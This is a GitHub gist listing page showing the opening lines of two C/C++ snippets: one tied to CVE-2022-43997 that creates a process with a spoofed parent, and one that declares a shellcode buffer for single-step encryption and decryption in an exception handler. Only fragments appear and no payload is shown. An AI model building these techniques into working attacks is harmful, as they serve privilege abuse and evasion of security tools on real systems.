Navigation Menu

Skip to content

Instantly share code, notes, and snippets.

View jackullrich's full-sized avatar
🏠
Working from home

jackullrich

🏠
Working from home
View GitHub Profile
@jackullrich
jackullrich / CVE-2022-43997.cpp
Created January 23, 2023 21:51
CVE-2022-43997
#include <memory>
#include <Windows.h>
bool CreateProcessWithParent(HANDLE hProcess, PWSTR commandline)
{
SIZE_T size = 0;
bool result = false;
STARTUPINFOEX si = { sizeof(si) };
PROCESS_INFORMATION pi = { 0 };
@jackullrich
jackullrich / mainc.c
Last active November 3, 2023 17:20
Single Step Encryption/Decryption
#include <Windows.h>
LONG SingleStepEncryptDecrypt(EXCEPTION_POINTERS* ExceptionInfo);
typedef VOID(__stdcall* Shellcode)();
LPBYTE ShellcodeBuffer;
ULONG_PTR PreviousOffset;
ULONG_PTR CurrentOffset;
ULONGLONG InstructionCount;
DWORD dwOld;